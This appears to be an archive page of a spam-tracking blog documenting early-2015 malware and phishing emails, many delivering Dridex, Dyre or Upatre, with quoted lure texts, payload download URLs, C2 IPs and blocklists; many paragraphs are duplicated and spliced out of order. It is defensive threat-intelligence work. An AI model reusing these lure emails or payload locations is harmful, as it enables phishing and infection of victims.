From: FedEx 2Day A.M.Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated [pastebin] but it is a bit clearer when deobfuscated [pastebin]. This script has a moderate detection rate of 9/56, and downloads a file from:
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
FedEx ®Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.
http://freesmsmantra.com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56. Automated analysis tools [1] [2] [3] don't give much of a clue as it has been hardened against analysis.
UPDATE: This tweet gives a bit more insight into the malware..
The malware dropped seems to be Boaxxe/miuref: ET TROJAN Miuref/Boaxxe Checkin {TCP} -> 91.231.87.90:80So, I would definitely recommend blocking 91.231.87.90 and also the domain coldserv24.com which is hosted on that server and may be malicious.
xxx
Wednesday, 4 February 2015
Infographic: Operation Yewtree vs Operation Fernbridge arrests
Two broadly equivalent investigations into child abuse rings, Operation Yewtree and Operation Fernbridge have had very different outcomes.
Yewtree has seen arrests of several high-profile people involved in the media, the majority of whom have not been found guilty of anything. But the rumoured suspects in Fernbridge include politicians, civil servants, judges and leaders of industry as well as a pop star or two. Why are the current outcomes looking so different?
Yewtree has seen arrests of several high-profile people involved in the media, the majority of whom have not been found guilty of anything. But the rumoured suspects in Fernbridge include politicians, civil servants, judges and leaders of industry as well as a pop star or two. Why are the current outcomes looking so different?
(an earlier version of this infographic was published in July 2014)
Labels:
Crime,
Infographic
Tuesday, 3 February 2015
Malware spam: "Circor [_CIG-EDI@circor.com]" / "CIT Inv# 15000375 for PO# SP14161"
This fake finance spam pretends to be from the wholly legitimate firm Circor, but it is not. Instead, it is a forgery with a malicious Word document attached.
http://gloo.ng/js/bin.exe
..which is then saved as %TEMP%\\dsfsdf.exe. This has a VirusTotal detection rate of 3/48 (it is identified as a Dridex component). According to the Malwr report, this phones home to a couple of IPs that I haven't seen before:
143.107.17.183 (Universidade De Sao Paulo, Brazil)
92.63.88.108 (MWTV SIA, Latvia)
It also drops a DLL with a detection rate of 3/56.
Recommended blocklist:
143.107.17.183
92.63.88.108
From: Circor [_CIG-EDI@circor.com]Don't be fooled by the email signature, the attachment is definitely nasty. So far I have only seen one version with a detection rate of 4/55, which contains a malicious macro [pastebin] that downloads a component from:
Date: 3 February 2015 at 09:56
Subject: CIT Inv# 15000375 for PO# SP14161
Please do not respond to this email address. For questions/inquires, please
contact our Accounts Receivable Department.
______________________________________________________________________
This email has been scanned by the MessageLabs outbound
Email Security System for CIRCOR International Inc.
For more information please visit http://www.symanteccloud.com
______________________________________________________________________
http://gloo.ng/js/bin.exe
..which is then saved as %TEMP%\\dsfsdf.exe. This has a VirusTotal detection rate of 3/48 (it is identified as a Dridex component). According to the Malwr report, this phones home to a couple of IPs that I haven't seen before:
143.107.17.183 (Universidade De Sao Paulo, Brazil)
92.63.88.108 (MWTV SIA, Latvia)
It also drops a DLL with a detection rate of 3/56.
Recommended blocklist:
143.107.17.183
92.63.88.108
Friday, 30 January 2015
Malware spam: "BACS Transfer : Remittance for.."
So far I have only seen one sample of this..
Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57] which contains a macro [pastebin] which downloads a file from:
http://stylishseychelles.com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57 identifying it as a Dridex downloaded. You can see the Malwr report here.
Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57] which contains a macro [pastebin] which downloads a file from:
http://stylishseychelles.com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57 identifying it as a Dridex downloaded. You can see the Malwr report here.
Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218
Tuesday, 27 January 2015
Malware spam: "Eileen Meade" / "R. Kern Engineering & Mfg Corp."
Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a forgery which has a malicious Word document attached.
http://UKR-TECHTRAININGDOMAIN.COM/js/bin.exe
http://schreinerei-ismer.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57. Automated analysis tools are inconclusive [1] [2] [3].
From: Eileen Meade [eileenmeade@kerneng.com]So far, I have seen two different version of the Word document, both poorly detected [1] [2] containing two different macros [1] [2]. These attempt to download a binary from one of the following locations:
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116
http://UKR-TECHTRAININGDOMAIN.COM/js/bin.exe
http://schreinerei-ismer.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57. Automated analysis tools are inconclusive [1] [2] [3].
Monday, 26 January 2015
Very lazy Walmart raffle ticket scam spam
Sometimes I see some very sophisticated scams with lovely websites and a credible and convincing pitch to snare the unwary. This isn't one of those, but it is a remarkably lazy piece of crap instead.
From: Walmart [clarkscott75875@gmail.com]I've heard it said that the scammers deliberately choose really stupid scams that only an idiot would fall for.. in order to filter out all those people who aren't idiots. So perhaps there is a point to all this half-arsed crappiness after all.
Reply-To: mrwilliamm234@gmail.com
Date: 26 January 2015 at 17:23
Subject: Walmart
Walmart,
This is to announce to the Public that the Wal-Mart Stores, Inc., have
started selling raffle ticket for the 2015 with the effect from today
been 1/26/2015, for more inquiries, contact our Publicity Department
below:
Wal-Mart Public Department
E-mail: publicityonwalmart@publicist.com
or
Mr. William Morgan
E-mail: mrwilliamm234@gmail.com
You will be directed on what to do to pick your form
Thanking you In Advance
Dennis Harrison
Walmart, Arkansas USA
Malware spam: "CardsOnLine@natwesti.com" / "Cards OnLine E-Statement E-Mail Notification"
This fake NatWest email leads to malware:
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe.
This binary has a VirusTotal detection rate of 1/56 and is identified by Norman AV as Upatre. Automated analysis tools are not particularly enlightening [1] [2].
From: CardsOnLine [CardsOnLine@natwesti.com]Users who click the link see a download page similar to this:
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: http://afreshperspective.com/NATWEST_BANK-MESSAGES-STORAGE/new.secured_document.html
Thank you
Cards OnLine
Many internet users have recently been targeted through bogus E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address.
Please be on your guard against E-Mails that request any of your security details. If you receive an e-mail like this you must not respond.
Please remember that, for security reasons, apart from when you create them at registration or when you change your Internet Pin or Password, we will only ever ask you to enter random characters from your Internet PIN and Password when you logon to this service.
You must keep your security details secret. We would never ask you, by E-Mail, to enter (or record) these details in full and you must not respond to E-Mails asking for this information.
National Westminster Bank Plc, Registered in England No 929027. Registered
Office: 135 Bishopsgate, London EC2M 3UR. Authorised and regulated by the Financial Services Authority.
This E-Mail message is confidential and for use by the addressee only. If the message is received by anyone other than the addressee, please return the message to the sender by replying to it and then delete the message from your computer. Internet E-Mails are not necessarily secure. National Westminster Bank Plc does not accept responsibility for changes made to this message after it was sent.
Whilst all reasonable care has been taken to avoid the transmission of viruses, it is the responsibility of the recipient to ensure that the onward transmission, opening or use of this message and any attachments will not adversely affect its systems or data. No responsibility is accepted by National Westminster Bank Plc in this regard and the recipient should carry out such virus and other checks as it considers appropriate.
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe.
This binary has a VirusTotal detection rate of 1/56 and is identified by Norman AV as Upatre. Automated analysis tools are not particularly enlightening [1] [2].
Malware spam: "HP Digital Device" / "Scanned Image"
From: HP Digital Device [HP_Printer@victimdomain.com]Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56, you can see various automated analyses here: [1] [2] [3]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device.
-------------------------------------------------------------------------------
This email has been scanned for viruses and spam.
-------------------------------------------------------------------------------
Labels:
EXE-in-ZIP,
Malware,
Spam,
Viruses
Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"
UPDATE: a new spam run using this firm's name is active as of 24th February. For more information click here.
Berendsen is a wholly legitimate firm in the textiles and laundry business. They are not sending out this spam, nor have their systems been compromised in any way. Instead, this email is a forgery with a malicious Word document attached.
http://elektromarket.cba.pl/js/bin.exe
This executable is saved as %TEMP%\LAVUBDAJLCD.exe and has a VirusTotal detection rate of 2/57 (Norman AV identified it as Dridex).
Automated analysis [1] [2] [3] [4] is proving difficult, a contact suggests that Botnet 125 (which is behind this spam run) is having stability problems. Shame.
Berendsen is a wholly legitimate firm in the textiles and laundry business. They are not sending out this spam, nor have their systems been compromised in any way. Instead, this email is a forgery with a malicious Word document attached.
From: donotreply@berendsen.co.ukAttached is a malicious Word document with a zero detection rate which contains a malicious macro [pastebin], and this in turn downloads a binary from:
Date: 26 January 2015 at 06:43
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 1st January.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you.
___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.
Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
http://elektromarket.cba.pl/js/bin.exe
This executable is saved as %TEMP%\LAVUBDAJLCD.exe and has a VirusTotal detection rate of 2/57 (Norman AV identified it as Dridex).
Automated analysis [1] [2] [3] [4] is proving difficult, a contact suggests that Botnet 125 (which is behind this spam run) is having stability problems. Shame.
Friday, 23 January 2015
Malware spam: "You have received a new secure message from BankLine"
For some reason these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
http://donumyok.com/RBS_BANK-ONLINE_SECURE_STORAGE/receive.personal-document.html
The landing page looks like this:
The link on that landing page goes to http://animation-1.com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded.
The ThreatExpert report shows that it attempt to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan.
From: Bankline [secure.message@rbs.com.uk]The link in the email seems to be somewhat dynamic, as I have also seen this slightly different variant of:
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
http://donumyok.com/RBS-DATA.STORAGE/personal.document.html
----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly.
For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 3513.
http://donumyok.com/RBS_BANK-ONLINE_SECURE_STORAGE/receive.personal-document.html
The landing page looks like this:
The link on that landing page goes to http://animation-1.com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded.
The ThreatExpert report shows that it attempt to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan.
Malware spam: "IRS Fiscal Activity 531065" / "support@irsuk.co"
This fake IRS spam actually does use the irsuk.co domain to host malware.
The WHOIS details for the domain are almost definitely fake, but kind of interesting..
Registrant ID: CR185450554
Registrant Name: Thomas McCaffrey
Registrant Organization: Real Help Communications, Inc.
Registrant Address1: 3023 Anzac Avenue
Registrant City: Roslyn
Registrant State/Province: Pennsylvania
Registrant Postal Code: 19001
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.2158872818
Registrant Email: tom@realhelp.net
They're interesting because these really are the valid contact details for Real Help Communcations, Inc which makes me wonder if their domain account at GoDaddy has been compromised.
A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk.co) , but the host on the IP identifies itself as ukirsgov.com which is a domain created on the same day (2015-01-19) but has been suspended due to invalid WHOIS details (somebody at csc.com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries.
The malware POSTS to garbux.com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF.
Overall, automated analysis tools are not very clear about what this malware does [1] [2] [3] [4] [5] although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk.co
garbux.com
ukirsgov.com
updateimage.ru
getimgdcenter.ru
agensiaentrate.it
freeimagehost.ru
From: IRS [support@irsuk.co]The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53. The irsuk.co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux.com (78.24.219.6 - TheFirst-RU, Russia)
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link above:
http://irsuk.co/DownloadIRSService/SetupIRS2015.zip
Thanks
Intrenal Revenue Sevrice
London W1K 6AH
United Kingdom
The WHOIS details for the domain are almost definitely fake, but kind of interesting..
Registrant ID: CR185450554
Registrant Name: Thomas McCaffrey
Registrant Organization: Real Help Communications, Inc.
Registrant Address1: 3023 Anzac Avenue
Registrant City: Roslyn
Registrant State/Province: Pennsylvania
Registrant Postal Code: 19001
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.2158872818
Registrant Email: tom@realhelp.net
They're interesting because these really are the valid contact details for Real Help Communcations, Inc which makes me wonder if their domain account at GoDaddy has been compromised.
A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk.co) , but the host on the IP identifies itself as ukirsgov.com which is a domain created on the same day (2015-01-19) but has been suspended due to invalid WHOIS details (somebody at csc.com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries.
The malware POSTS to garbux.com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF.
Overall, automated analysis tools are not very clear about what this malware does [1] [2] [3] [4] [5] although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk.co
garbux.com
ukirsgov.com
updateimage.ru
getimgdcenter.ru
agensiaentrate.it
freeimagehost.ru
Malware spam: "2014 Tax payment issue" / "Your tax return was incorrectly filled out"
This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither are detected by AV vendors [1] [2] containing one of two malicious macros [1] [2] that download a file 20.exe from the following URLs:
http://37.139.47.221:8080/koh/mui.php
http://95.163.121.82:8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending.
From: QuintonAttached is a Word document with a random name, but always starting with "TAX_". Examples include:
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector
-----------------
From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither are detected by AV vendors [1] [2] containing one of two malicious macros [1] [2] that download a file 20.exe from the following URLs:
http://37.139.47.221:8080/koh/mui.php
http://95.163.121.82:8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending.
Thursday, 22 January 2015
Yet more MyFax malware spam
There's another batch of "MyFax" spam going around at the moment, for example:
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http://202.153.35.133:51025/2201us22/HOME/0/51-SP3/0/
http://202.153.35.133:51025/2201us22/HOME/1/0/0/
http://when-to-change-oil.com/mandoc/story_su22.pdf
http://202.153.35.133:51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to block traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48.
I haven't seen a huge number of these, the format of the URLs looks something like this:
http://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http://[redacted]/_~NEW.FAX.MESSAGES/incoming.html
From: MyFax [no-replay@my-fax.com]Clicking the link leads to a page like this:
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http://202.153.35.133:51025/2201us22/HOME/0/51-SP3/0/
http://202.153.35.133:51025/2201us22/HOME/1/0/0/
http://when-to-change-oil.com/mandoc/story_su22.pdf
http://202.153.35.133:51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to block traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48.
I haven't seen a huge number of these, the format of the URLs looks something like this:
http://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http://[redacted]/_~NEW.FAX.MESSAGES/incoming.html
Wednesday, 21 January 2015
"Hartford Tech Summit" aka BizSummits: What's wrong with this picture? (hartfordsummit.com / hartfordsummit.org)
Last year I called out serial spammers BizSummits for their use of stolen photographs that they were attempting to pass off as activities at one of those summits.
A comment on one of the posts indicates that BizSummits are suffering from a degree of butthurt because of this.
If you read my previous post on these folks, you might guess where this is going.
Now, bearing in mind the cringing embarrassment they must have felt when I pointed out that all the photos on their sites were of something else entirely, you would expect that they'd use a genuine photograph of one of their summits. I mean, everyone has a digital camera, right? It would be hard to avoid taking a photograph of one of these summits. And they have so many of them.
Let's have a closer look at that photo (http://loadurl.org/hartfordsummit/images/whatsnew.jpg)
It certainly looks like a seminar or summit. But let's see what a Google Reverse Image Search says..
It guesses that this is a picture of "business seminars" and reveals that the same photo is in use on many different sites. And in fact, you just need to do a Google image search for "Seminars" and it turns up in a prominent position.
So now we need some detective work, the original image doesn't appear to be online but I can find a slightly higher resolution one.
There's an interesting sign on the wall..
"The Ivy Review" it says. That matches pretty closely with a photo from ivycenters.com which has a very similar photograph.
This photograph was taken in the Santa Clara Convention centre. That's about 3000 miles from Hartford, but that's not really the point. The point is that this appears to be the photograph of a completely different convention from a completely different organisation. It is certainly a commonly used picture for "seminars" that people paste in when they haven't actually got a picture.
In fact, I have never seen a verifiable photo of any BizSummits event. Perhaps I am looking in the wrong place. Perhaps someone needs to buy BizSummits a digital camera. Draw your own conclusions.
As for a free trip to Connecticut to see BizSummits in action. Yeah, I think I'll pass on that offer.
A comment on one of the posts indicates that BizSummits are suffering from a degree of butthurt because of this.
Hi Conrad, we just received an autonotice about the comment from Claire Le and were again hoping you would consider archiving/mothballing it because readers see the misleading title which is why the commenter incorrectly surmised BizSummits is a fake after reading it. I think you know it is not, we are glad to immediately make you a member of one of the groups if wished so you can login and watch/listen to hundreds of past meetings (impossible if it were really a fake), and we are also glad to cover your airfare from the UK if you wish to attend any of the in-person events (next on the schedule is the HartfordSummit.com in a few weeks and then a series in Chicago in April including a CIO roundtable you might have interest in attending). Thank you for your consideration.HartfordSummit.com? That's a new one on me. Let's head over to that website.
If you read my previous post on these folks, you might guess where this is going.
Now, bearing in mind the cringing embarrassment they must have felt when I pointed out that all the photos on their sites were of something else entirely, you would expect that they'd use a genuine photograph of one of their summits. I mean, everyone has a digital camera, right? It would be hard to avoid taking a photograph of one of these summits. And they have so many of them.
Let's have a closer look at that photo (http://loadurl.org/hartfordsummit/images/whatsnew.jpg)
It certainly looks like a seminar or summit. But let's see what a Google Reverse Image Search says..
It guesses that this is a picture of "business seminars" and reveals that the same photo is in use on many different sites. And in fact, you just need to do a Google image search for "Seminars" and it turns up in a prominent position.
So now we need some detective work, the original image doesn't appear to be online but I can find a slightly higher resolution one.
There's an interesting sign on the wall..
"The Ivy Review" it says. That matches pretty closely with a photo from ivycenters.com which has a very similar photograph.
This photograph was taken in the Santa Clara Convention centre. That's about 3000 miles from Hartford, but that's not really the point. The point is that this appears to be the photograph of a completely different convention from a completely different organisation. It is certainly a commonly used picture for "seminars" that people paste in when they haven't actually got a picture.
In fact, I have never seen a verifiable photo of any BizSummits event. Perhaps I am looking in the wrong place. Perhaps someone needs to buy BizSummits a digital camera. Draw your own conclusions.
As for a free trip to Connecticut to see BizSummits in action. Yeah, I think I'll pass on that offer.
Labels:
BizSummits
Tuesday, 20 January 2015
Malware spam: "Barclays - Important Update, read carefully!" / "Barclays Online Bank [security-update@barclays.com]"
From: Barclays Online Bank [security-update@barclays.com]The link in the email varies, some other examples seen are:
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: http://fizza.ro/BARCLAYS~ONLINE.BANKING~UPDATE/update.html
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused.
(c) Copyright 2015 Barclays Bank Plc. All rights reserved.
http://nrjchat.org/ONLINE~IMPORTANT-UPDATE/last-update.html
http://utokatalin.ro/ONLINE-BANKING_IMPORTANT/update.html
http://cab.gov.ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some javascript hoops, and then leads to a ZIP file download which contains a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http://202.153.35.133:33384/2001uk11/HOME/0/51-SP3/0/
http://202.153.35.133:33384/2001uk11/HOME/1/0/0/
http://clicherfort.com/mandoc/eula012.pdf
http://202.153.35.133:33387/2001uk11/HOME/41/7/4/
http://essextwp.org/mandoc/ml1from1.tar
Out of these 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe which has a VirusTotal detection rate of just 3/57 and is identified as Dyreza.C by Norman anti-virus.
Subscribe to:
Posts (Atom)